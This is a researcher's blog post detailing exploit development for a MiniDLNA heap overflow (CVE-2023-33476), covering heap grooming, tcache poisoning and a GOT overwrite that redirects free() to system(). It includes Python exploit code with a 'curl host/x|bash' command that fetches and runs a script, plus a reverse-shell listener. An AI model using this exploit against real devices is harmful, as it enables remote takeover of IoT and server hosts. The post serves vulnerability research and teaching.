Introduction

This is the second part of the two-part series covering a heap overflow I found in ReadyMedia MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going over the various challenges that had to be overcome and how everything was put together to achieve remote code execution and pop a shell. Check out part 1 for the root cause analysis of this bug.

Before diving into the details of the vulnerability and the exploit, its worth taking a moment to go over the basics of how chunked requests work and fundamentals of the bug.

Disclaimer: this is a pretty long post and there may be a few details I might have missed, but I’ve tried to include as much as possible to help it all make sense and help others who are trying to learn. If you find any glaring issues/mistakes please reach out to let me know and I’ll add any corrections needed.

If you just care about the code, you can find it here.

review of http chunked encoding

An HTTP request will set the Transfer-Encoding HTTP header to chunked to indicate to the server that the body of the request should be processed in chunks. The chunks follow a common encoding scheme: a header containing the size of the chunk (in hex) followed by the actual chunk data. As this is HTTP, the character sequence \r\n serves as delimiter bytes between chunk size headers and chunk data. The last chunk (terminator chunk) is always a zero-length chunk.

A typical request using chunked encoding will look something like this:

POST /somepath HTTP/1.1
Transfer-Encoding: chunked

4
AAAA
10
BBBBBBBBBBBBBBBB
0

The request above contains two chunks: one 4-byte chunk and one 16 byte chunk (chunk sizes are parsed as hex), followed by the zero-length terminator chunk. The server will parse the chunk sizes and use this to construct a single blob of data composed of the concatenated chunk data, minus the size metadata.

summary of the bug and initial primitive

Let’s review the fundamentals of the bug and the primitives provided. The relevant snippet of code that triggers the memory corruption as a result of the bug is shown below.

    char *chunkstart, *chunk, *endptr, *endbuf;

    // `chunk`, `endbuf`, and `chunkstart` all begin pointing to the start of the request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunk size parsed by strol() above
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }

To recap the important details:

  • strtol() is used to parse the HTTP chunk size from the body of the request (which we fully control). The value returned by strtol() is saved to h->req_chunklen
  • h->req_chunklen is used as the size argument in a call to memmove() without bounds-checking
  • The dest and src arguments passed to memmove() are both offsets into the request buffer; in theory, they should point to the first digit of the chunk size and the first byte of the actual chunk data that follows the chunk size, respectively.
  • the request buffer containing our data is allocated on the heap

Due to the missing bounds-check in the code above (and the broken validation logic that is the root cause of the issue), the bug provides an OOB read/write primitive of arbitrary size. At this point, I still had almost no control over what gets written and where its written to. Since the corruption occurs on data allocated on the heap, this introduced the option to either attack the application data directly or target the heap metadata to derive more powerful primitives.

Understanding the Corruption Mechanism

NOTE: all references to “chunks” in the sections below are referring to HTTP chunks, not heap chunks.

effects of memmove()

We’ll start with the detail that had the most impact on developing the exploit: the use of memmove() to concatenate the end of one HTTP chunk to the next. Each iteration through the while loop in the code snippet above is meant to process a single HTTP chunk from the body of the request; assuming multiple chunks are present (which is always the case for valid requests) the code needs to concatenate the beginning of the chunk it is processing to the tail end of the chunks that have already been processed and remove the chunk size metadata between them. The application does this in-line within the same buffer instead of creating a new allocation to hold the final blob of data; it selects the range of bytes pertaining to the current chunk being processed based on the chunk size it finds in the request and will then ‘left-shift’ those bytes x bytes lower in memory, where x is the total length of the chunk size field (i.e. strlen(chunk_size_line)).

In practical terms, this introduces the following conditions and constraints:

  • As we can only control the size and not the location of the r/w, we are only be able to r/w higher into memory relative to location of the chunk in the buffer allocated for the request
  • The number of bytes the data will be left-shifted by is determined by the distance between the dest and src args passed to memmove() (endbuf and endptr respectively in the snippet of the vulnerable code above)

visualizing the operation

This particular aspect of the bug and the impact it has on exploitation isn’t very intuitive (at least not to me) so it may be useful to try to visualize it. I created the graphic below using Google Sheets (lol) while working on the exploit to help me grok the details so I’m hoping it’s useful here.

The before and after rows below represent a contiguous chunk of memory containing the contents of an HTTP request before and after the memmove() operation using the chunk size at the beginning of the request data (23). We can imagine that the row of bytes is a ribbon on a fixed track; by “pulling” on the left side of the ribbon starting at read_src , we can shift the bytes to the left toward us (we’re fixed at write_dest). There isn’t a limit to how much data to the right of read_src we can shift left, but we can only shift by (read_src - write_dest) slots. The grid slots (i.e. addresses) are fixed, so if we want some payload to end up at a specific target address we need to be able to shift the bytes of that payload left by at least (target_addr - payload_addr).

To break it down:

  • The cells with the red border show the bytes that would be selected by a chunk size of 23 (as seen at the beginning of the row)
  • The location where memmove() will write the bytes to is highlighted in green (endbuf ptr passed as first arg)
  • The location where memmove() will start reading from is highlighted in purple (endptr ptr passed as the second arg)

memmove-viz-1.png

Extrapolating from the examples above, we can see that changing the chunk size alone will have virtually 0 impact on where the data is written relative to our target — larger sizes will reach further into memory but will result in those bytes being shifted by the same distance, which means for a given target at address x and payload data at x+20, selecting bytes up to x+20 or x+100 will result in the same bytes being written to x after the call to memmove().

controlling the shift distance

As mentioned in the previous section, the distance the selected byte-range is shifted by is determined by the number of bytes between the pointer where the bytes will be written (endbuf) and the pointer where data will be read from (endptr). Based on the parsing logic, this ends up being the number of bytes between the first byte of the chunk size in the request body and the location where the first byte of actual chunk data is expected to be. In the code, this is done by passing a pointer &endptr as the second arg to strtol() when parsing the chunk size value from the request to have strtol() store the location of the first non-parsable value it encounters to this pointer. In a normal request, this would be the \r that comes immediately after the chunk size. The code checks for the presence of \r\n starting at the value saved to this pointer to confirm this sequence is in fact present and if found increments it by 2 to move it past those characters. The pointer would then presumably point to the start of the actual chunk data.

The relevant code is shown again here:

  while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
  {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        { ... }
        endptr += 2;

        memmove(endbuf, endptr, h->req_chunklen);
...

This means that in order to gain control over that distance, its necessary to introduce additional bytes between the two pointers without causing strtol() to stop parsing prematurely. Taking a look at the manpage for strtol(), the following line caught my attention:

The string may begin with an arbitrary amount of white space (as determined by isspace(3)). […] The remainder of the string is converted to a long value in the obvious manner, […]

By prepending the chunk size value with whitespace, it’s possible to introduce a nearly arbitrary number of bytes in order to affect the distance between endbuf and endptr when memmove() is called. Alternatively, prepending 0's to the chunk size achieves the same result.

example

This example shows a request where no leading whitespace has been added. At the first round of processing:

  • endbuf is at index/address 489
  • endptr is at index/address 493
  • Chunk size is 23, so 23 bytes will be shifted
  • (489 - 493 = -4), so each byte in the range of bytes to be shifted will shift -4 bytes down.
  • We want to overwrite 4 bytes starting at index 501 (cells highlighted in red)
  • The payload data we want to use for the overwrite starts at index 512 (cells highlighted in yellow)
  • Distance between overwrite target and overwrite data source is -11 bytes
  • The corruption does NOT successfully shift our overwrite data to the desired location

shift-viz-1.png

With the introduction of whitespaces prepended to the chunk size at the start of the request body:

  • endbuf is now at index 482
  • endptr is still at index 493
  • (482 - 493 = -11), so each byte in the range of bytes to be shifted will shift -11 bytes down.
  • We want to overwrite 4 bytes starting at index 501
  • The data we want to use for the overwrite starts at index 512
  • Distance between overwrite target and overwrite data source is still -11 bytes

shift-viz-2.png

Based on this, I concluded that it would be necessary to insert enough whitespace before the chunk size to make endbuf - endptr == overwrite_target - payload_data

heap-based corruption

The corruption occurs on heap-allocated data, so it’s possible to corrupt the metadata of neighboring heap chunks. Based on the conditions described so far, it’s actually impossible to avoid corrupting at least the chunk that is immediately next to ours. This is because for a minimal request containing no data in the chunk fields (such as the request provided as an example at the beginning of this post) the memmove() operation is going to be performed on data near the end of the allocated buffer, overflowing into the next chunk almost immediately. While this introduces additional attack surface and exploitation options, it also adds some limitations, namely the need to bypass Glibc security and sanity checks so as to avoid abort()ing before the exploit finishes or triggering some other crash.

Heap Feng Shui

NOTE: references to “chunks” below are referring to heap chunks now, not HTTP chunks.

Given the heap-allocated buffers, we’ll focus on exploiting the heap directly (i.e. targeting heap chunk metadata). Heap-based exploits typically benefit from (or outright require) achieving some level of control over the layout of the heap in order to get target objects and payload data allocated at predictable locations. Based on conditions described above, this would be absolutely necessary for a successful exploit in this case. Specifically, it would be necessary in order to meet these requirements:

  1. The target address for the overwrite target must be located higher in memory relative to where the request buffer used to trigger the corruption is located
  2. The payload data used to overwrite the target address must be located higher in memory relative to the target address

Based on these requirements, the ideal memory layout would look something like this:

0x2000
---
	.....................
	...request_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

For this theoretical layout, we would then provide a chunk size large enough to traverse the overwrite_target and reach the last byte of the payload_data.

In practice, to achieve the layout above its necessary to:

  • Have controlled data allocated to the heap
  • Prevent the allocations from being free()’ed prematurely
  • Force allocations to happen sequentially or in a way that can be reliably predicted

controlling allocations

Unsurprisingly, the most straightforward way to force the application to make heap allocations with controlled data is by sending HTTP requests, so this can be used as an interface/proxy for malloc(). One important detail about this is that the request buffer allocations are done using realloc() rather than malloc() — requests that exceed 2048 bytes will result in the existing allocation being reallocated, which can affect the heap layout and result in heap chunks being freed unintentionally. We can avoid this issue entirely by keeping all requests below this size.

holding request allocations

The next requirement is almost more important than the first — the allocations containing our controlled data must remain allocated across multiple requests in order to successfully get the desired memory layout. This took a little bit of fiddling around but I eventually found an easy way to do this.

The code that handles the initial reading of the request data from the socket is shown below. After copying the data from the static buffer to the dynamically allocated buffer at h->req_buf, it searches for the presence of the sequence \r\n\r\n using strstr() to determine whether the entire contents of the HTTP headers have been received (the first occurrence of that sequence is expected to be the terminator for the headers).

        memcpy(h->req_buf + h->req_buflen, buf, n);
        // update req_buflen
        h->req_buflen += n;
        h->req_buf[h->req_buflen] = '\0';

        /* search for the string "\r\n\r\n" */
        // this is the mechanism used to determine where the end of the http
        // headers are since that should be the first occurance of this string sequence
        // for a normal http request.
        endheaders = strstr(h->req_buf, "\r\n\r\n");

        if(endheaders)
        {
          h->req_contentoff = endheaders - h->req_buf + 4;
          h->req_contentlen = h->req_buflen - h->req_contentoff;
          ProcessHttpQuery_upnphttp(h);
        }

If this sequence is not found, the application will move on without entering the block where ProcessHttpQuery_upnphttp() is called above and wait for the client to send more data to complete the headers. This leaves the buffer at h->req_buf containing up to the first 2048 bytes of data sent allocated indefinitely until more data arrives on the socket or the connection is dropped by the client. By introducing a NULL byte anywhere before the first \r\n\r\n terminator in the request data sent it’s possible to force strstr() to terminate early and not find those characters. Alternatively, not including the terminator sequence at all will also result in the application assuming the client has not yet sent all headers and holding the the allocation. We can then free() any allocation made this way by closing the socket used to initiate it.

getting sequential allocations

With the two previous steps figured out, it was then possible to start influencing the heap layout with sufficient control to start working on getting the allocations made in a predictable way in order to eventually set things up in an ideal way for the exploit. The first step was to identify where heap allocations happen along the execution path for request processing, their sizes, and whether they contained any data that may be interesting to target. After a bit of code review we can determined that, apart from the request buffer allocation (saved to h->req_buf), the only other relevant allocation that happens for each request is for a upnphttp structure, which stores the state, data, and metadata for the request being processed (saved to h). The pointer to the request buffer itself is stored inside the upnphttp structure.

I created the following GDB script to log every time either a request allocation or upnphttp struct allocation occurred and the addresses for the allocations.

set verbose off
gef config context.enable False

break upnphttp.c:1140
commands 1
    echo \n\n
    printf "============== Allocation for req_buf is at %p\n",h->req_buf
    echo \n\n
    printf "==============================================\n"
    continue
end

break upnphttp.c:118
commands 2
    echo \n\n
    printf "============== NEW upnphttp struct is at = %p\n",ret
    echo \n\n
    printf "==============================================\n"
    continue
end

run -R -f testing_tmp.conf -d

I wrote a Python script using raw sockets to start performing allocations for both the upnphttp structures and the request buffers and observing the addresses where the allocations occurred, using the method described in the previous section to keep the allocations held in memory across multiple requests. This took a bit of fiddling and playing with the order that connections were initiated in and when request buffers were allocated but I eventually found that after about 6-7 request buffer allocations (after having initiated the connections ahead of time) the buffers began getting allocated sequentially in memory.

separating the connection and request buffer allocations

Because the fields of the upnphttp structure are accessed throughout the code that handles request processing, it would be ideal to separate those allocations from the request buffer allocations so that the latter end up allocated sequentially, rather than having the upnphttp structures sandwiched between them. This can be accomplished by initiating the connections that will be needed before sending any data on the sockets — the upnphttp structures are allocated when the connection is received (in New_upnphttp(), called by ProcessListen() upon receiving a new connection) and will remain allocated as long as the connection is kept open, which allows us to send data asynchronously from when the connections are initiated.

the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap

Taking another look at the ideal heap layout described above, here is what needs to be done to construct it using the techniques and information described so far:

  • Allocate the connection upnphttp structs that will be needed before sending any request data
  • Send request data on x of the allocated connections to reach the point where request buffer allocations start happening sequentially. The real ‘crafted heap’ starts here.
  • Send the request data for the request that will trigger the corruption (’top’ of the crafted heap, at lower address)
  • Send request data to create another request buffer allocation of the same size as the previous one (the ‘middle’). Assume the overwrite target is the heap chunk metadata of this allocation.
  • Send the request containing the payload data that will be written to the target (’bottom’ of the crafter heap, at higher address)
0x2000
---
	.....................
	...corrupt_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

As can be seen, the request that is used to trigger the corruption must be sent before allocating the other buffers to have it allocated at a lower address relative to the others. This is a bit of an issue because sending the actual corruption payload first would either trigger a crash prematurely at worst (preventing anything else from being done) or get processed and result in the buffer being free()‘d at best. After spending some time learning about the Glibc malloc implementation and heap exploitation in general, I chose to address this issue by using a ‘placeholder’ allocation in the place where the corruption buffer would need to be; that allocation then gets free()‘d immediately before sending the actual corruption request, after the crafted heap has been set up. By making this placeholder allocation the same size as the corruption request allocation (rounded up to the actual malloc chunk size), making an allocation of that size immediately after it’s free()‘d results in the same chunk being returned by malloc() due to its “first fit” design. This means that sending the actual corruption request after dropping the connection for the placeholder buffer (causing it to be free()‘d) will result in the data for the corruption payload being allocated where we need it.

putting it all together

Having figured out everything covered in the previous sections, we now have everything we need to write an exploit. Before going into the meaty details, lets take a moment to review. We can now:

  • Control when allocations (i.e. malloc calls) are made and control their size
  • Control when allocations are free()‘d so we can keep buffers in place while we make other allocations
  • Have sufficient influence over the allocator to get it to start giving us allocations that are sequential in memory
  • Have the request buffer that will trigger the corruption allocated in an ideal location for exploitation

Exploit: Arbitrary R/W via Tcache Poisoning for RCE

Whew! That was a lot of background to cover but hopefully that will all help with making sense of the actual exploit. The sections below cover the specific exploit I wrote more directly, though I’ll avoid going into specifics like sizes and addresses since those are variable and not critical for understanding how the exploit works. The source code for the exploits has been heavily commented if you’re interested in more details.

The exploit performs a tcache poisoning attack in order to trick malloc into returning a pointer to an arbitrary location and achieve arbitrary read/write; it uses this to get a pointer to the Global Offset Table (GOT) and overwrite the entries for free() and fprintf() to point to system(). free() is targeted as it will be called for h->req_buf at the end of request handling, transforming the call from free(h->req_buf) to system(h->req_buf). The payload sent for the final allocation where the GOT is corrupted begins with a shell command that will download and execute a script from an attacker-controlled server and spawn a reverse shell.

setup: building the target

The exploit is written for a binary with only partial RELRO and no PIE; the address of system() in libc and the address of the GOT are assumed to be known. The binary is built on a Debian 11 VM using Glibc 2.31 (default version installed by OS).

# install deps
sudo apt install -y autoconf autopoint libavformat-dev libjpeg-dev libsqlite3-dev \
  libexif-dev libogg-dev libvorbis-dev libid3tag0-dev libflac-dev

git clone https://git.code.sf.net/p/minidlna/git minidlna-git
cd minidlna-git && git checkout tags/v1_3_2
./autogen.sh
./configure --enable-tivo CC=clang CFLAGS="-g -O0 -fstack-protector"
make minidlnad CC=clang CFLAGS="-g -O0 -fstack-protector"

This is the output of the checksec tool for the output binary:

-> % checksec ./minidlnad
[*] '/home/hyper/minidlna-1.3.2/minidlnad'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The server can be started using the following command:

sudo ./minidlnad -R -f minidlna.conf -d

tcache poisoning tl;dr

I’ll assume you have some background on heap exploit techniques so won’t go super in-depth here but if not I highly recommend the how2heap series on Github. It covers basically every known technique and has up-to-date examples for the latest Glibc versions. The explanation given below applies to Glibc ≤2.31; newer versions have some additional constraints and checks that will need to be bypassed.

At a high-level, a tcache poisoning attack abuses the behavior of the Glibc malloc implementation and how the tcache (per-thread free bins) entries are handled in order to trick the allocator into returning a pointer to an arbitrary location. The tcache uses bins with predefined sizes and inserts chunks into the appropriate bin based on a matching size. Chunks are inserted into the tcache bins in a LIFO manner and since the allocator doesn’t need to traverse the list of free chunks in both directions, it only keeps a singly-linked list using the fd fields of the free()‘d chunks to keep track of them. By corrupting the fd pointer of a free’d chunk in a tcache bin for a given size, a subsequent call to malloc() for that size will result in the allocator returning the chunk pointed to by fd.

constructing the fake chunk for poisoning

Based on what’s needed for the tcache poisoning to work, we need to corrupt a heap chunk that’s already been free’d and this chunk needs to be located after the request buffer containing the payload that will trigger the corruption. The chunk that will be targeted is a request buffer, so we control its contents and can place the payload data we want written to the target location (the fd pointer) within it. One important thing to note is that because we free the chunk before corrupting it, the first 16 bytes of the data we send will be overwritten by free() to store the fd and bk pointers (though technically only the fd pointer is actually used by tcache), so the payload data sent is placed at +16-byte offset into the buffer to avoid it being corrupted before we copy it over the target location.

The illustration below shows how this chunk would look before and after being free’d, with return_addr at the right offset to ensure its left intact.

fake-chunk-1.png

heap preparation

The first step taken is to use the techniques described earlier in the post to set the heap up so that we can get allocations created sequentially and spray the fake chunks described in the previous section into those allocations to use them later.

    # * the socks at the end of this list should all be right next to each other
    # * we'll free these LIFO from the tail to ensure our next allocs for the corruption 
    #   will come from that sequential chunks. we need at least 2-3 sequential chunks so we use
    #   a total of 10 allocations here

    # create and connect needed sockets before sending any data on any of them. This should
    # keep the allocations for the upnphttp structs separate from the request buffer allocations.
    GROOMING_ALLOCS = 10
    xpr(f"starting heap grooming round, using {GROOMING_ALLOCS} allocs...")
    dummies = create_sockets(GROOMING_ALLOCS)
    connect_sockets(dummies, server_ip, server_port)

    # This is the target address we want malloc to return after the chunk has been corrupted
    where = pwn.pack(target_addr, 64)

    # create the fake chunk described above. pad with 16 bytes to skip the first 2 8-byte fields
    # (fd, bk)
    pre_pad = b"\x11" * 16 # \x11 is arbitrary
    core = pre_pad + where

    # pad the end of the paylaod with enough bytes to meet the size needed for the target tcache bin
    # allocations need to be kept the same size because tcache bins must match exact sizes
    payload = pad(ALLOC_SIZE, core)

    # send the payload on all of the sockets we opened; this should result in 10 request buffer allocations;
    # the last 3-4 will be allocated sequentially.
    sendsocks(dummies, payload)

    # free the last 4 allocs we made in reverse order to add those chunks to the tcache bin for the matching size
    # so they're returned to us on the next allocations we make of the same size. by closing the sockets, we free
    # both the upnphttp structs and the request buffers they contain.
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()

After this code runs and the last few allocations are dropped, those free’d chunks should look something like this in memory and should be in the tcache bin for the matching size (0x60):

fake-chunk-2.png

poisoning the free’d chunk

Immediately after setting up the heap, the exploit then initiates a connection for the request that will be used to trigger the bug and corrupt the neighboring free’d chunk. The payload used to trigger the corruption is padded to match the size of the chunks we just free’d in the previous step so when the allocation is made, malloc() will return the last chunk that was inserted into the bin. Because the allocations were free’d in reverse order, the last chunk that was inserted into the corresponding tcache bin will be the top chunk shown in the illustration above (at the lower addresses), so that’s the chunk we’ll get back.

Assuming everything is set up correctly, the chunk for the corruption request and the target chunk will then look like this (the buffer containing the corruption payload highlighted in green). As can be seen, things are now set up in such a way that we should be able to use the OOB read to read past the end of the buffer containing the corruption payload and into the free’d chunk immediately after it. The free’d chunks still contain the return address payload we want to have written over the fd pointer of the same chunk, so we should be able to reach return_addr with the call to memmove() since we have full control over the len argument.

fake-chunk-3.png

The write portion of the memmove() will then “slide” the selected region of bytes “up” (based on the illustration above) so that return_addr ends up overwriting fd 40 bytes below it. To accomplish this, the HTTP chunk size in the corruption payload is prepended with whitespace characters (~40) to ensure the bytes are shifted by the correct distance to align the write at the desired location as described in the “controlling the shift distance” section earlier in the post. Once this request has been processed, it will get free’d and inserted back into the same tcache bin ahead of the now-corrupted free’d chunk. Those free’d chunks will then look like this (note that the size, prev_size, etc values shown at the end of the corruption buf are from the chunk below it, showing where those values end up after the call to memmove()):

fake-chunk-4.png

In order to get the tainted chunk returned to us (the middle one in the illustration), we’ll need to make at least 1 allocation of that same size before that and then the next allocation of that size will have malloc() return the pointer we wrote to fd back to us. In the case of the exploit, this will be the address of the Global Offset Table (GOT).

corrupting the GOT

After successfully tricking malloc() into returning a pointer to the GOT, the next step is to corrupt one (or more) of the entries contained within to achieve code execution. The most straightforward way to do this is to call system() and pass it a pointer to some data we control containing a string with the command we want to execute. Since we have full control over the content that’s written, the question is then to figure out which function(s) to corrupt. Because system() expects a single argument that’s a pointer to some string data, the function(s) we target must also take a char (or void) pointer for its first argument and that pointer has to point to data we control. Finally, the target function(s) need to be called at some point after we’ve corrupted the GOT but before any other GOT entries that we’ve corrupted are referenced, since this will almost certainly result in a crash.

Taking all of this into consideration, I eventually found the two functions that would be targeted: fprintf() and free(). The actual entry that produces the code execution is free() but because the minimum size needed for the request buffer is greater than 8 bytes and we can’t do partial writes into the request buffer, successfully corrupting free() also results in corrupting other GOT entries, including the one for fprintf(), so it needs to point to a valid function since it’s called at least once before the next call to free(). Corrupting free() is a logical option since it meets all of the requirements without any additional setup: it takes a single pointer argument and will be called and passed the pointer to our request buffer almost immediately after we corrupt the GOT, reducing the risk of other functions that have been corrupted being called and crashing the application prematurely. As a bonus, hijacking free() also helps us avoid triggering the sanity checks in Glibc that would trigger an abort() after we’ve corrupted the heap metadata.

Because free() (i.e. system() after the GOT is corrupted) will be called on the pointer to the GOT where we’re writing the fake entries to, we can insert the command string we want passed to system() right at the start of the buffer to have it executed. The code below shows the construction of the final payload containing the command to run and the fake GOT entries with the padding needed for the binary the exploit was written for (free() at GOT+0x40, fprintf() at GOT+0x50):

    # set up the command string that will be passed to system()
    staging_server_addr = f"{args.lhost}:{args.lport}"
    # command: e.g. `curl 192.168.1.8:8080/x|bash`
    command_str = f"curl {staging_server_addr}/x|bash".encode()
    command_padding = b""

    # final cmd string max len is 64, if less than, pad it out
    OFFSET_TO_FREE = 64
    if len(command_str) < OFFSET_TO_FREE:
        command_padding = b"\x00" * (OFFSET_TO_FREE - len(command_str))
    if len(command_str) > OFFSET_TO_FREE:
        xpr("command string too long using provided args, offsets will fail. bailing...")
        sys.exit(1)
    command = command_str + command_padding

    # set up fake GOT table for the overwrite (note: this will need to updated for binaries that have different offsets between the two)
    got_table = b""
    got_table += pwn.p64(args.system_addr) # free() entry
    got_table += pwn.p64(0x0) # pad
    got_table += pwn.p64(args.system_addr) # fprintf() entry

    final_payload = command + got_table

After the final payload above has been sent and the GOT has been corrupted, the next call to free() will actually be a call to system() and it will be passed the pointer where we just wrote the payload.

reverse shell stager and listener

The command string passed to system() will download a script from an attacker-controlled server using curl and pipe the contents of the script to bash. The exploit sets up an HTTP listener to handle the incoming request and responds with a small script to initiate a reverse shell back to the attacker-controlled server. After responding to that request, it creates the listener for the reverse shell and waits for the connection.

    # handle the http request to serve script to spawn reverse shell
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        l.sendline(resp.encode() + reverse_shell_cmd.encode())
        l.close()
    else:
        xerr("=ERROR=: Timed out waiting for staging connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure curl is available on target")
        sys.exit(1)

    # wait for the incoming reverse shell connection; bail if we don't get it in a second.
    l = pwn.listen(args.lport)
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        xpr("~~~ <CHONKCHONKCHONK> ~~~")
        l.interactive()
    else:
        xerr("=ERROR=: Timed out waiting for reverse shell connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure netcat is available on target")
        sys.exit(1)

popping a shell

And here’s the exploit running against the target binary:

exploit.png

Wrapping Up

And there we are! Hopefully this has all been useful for understanding everything that goes into writing a full exploit for this kind of vulnerability. Ultimately, it isn’t complete in the sense that it assumes an info leak is already present to leak Libc and GOT addresses. This same bug could potentially be used to get that info leak but I didn’t invest much time in figuring that out. Maybe that can be left as an exercise for the curious reader.

exploitability in the Real World(TM)

Exploitability of this bug will be dependent upon the Libc version the application is linked against and compiler exploit mitigations used, to some extent. Given the variability of these factors across the range of devices this application is deployed to (IoT, routers, linux servers), there is a high likelihood of finding Libc versions vulnerable to multiple heap exploit techniques and missing exploit mitigations such as ASLR, RELRO, etc. Ultimately, because the bug provides for a strong write primitive, there are various options for exploitation. While most modern Linux distros running on desktop/server hardware now enable common compiler exploit mitigations for default applications and applications installed through the package manager, MiniDLNA is frequently deployed on IoT devices where those mitigations are likely to not be enabled; versions built from source by end-users are also unlikely to enable these mitigations. The exploit strategy and mechanisms used in the included exploits will not work universally across all platforms and configurations, but there are likely dozens of targets that would meet the necessary criteria.

arm32 exploit?

This post is already pretty long and it’s taken me longer than expected to release it, so I’ve decided the split the last section going over the exploit I wrote for the arm32 minidlnad binary from the Netgear RAX30 into a separate post, though the exploit code for both will be made available now. That exploit works a little differently, targeting the stack rather than the GOT for overwrite since that binary has full RELRO enabled (which makes the GOT read-only).

Resources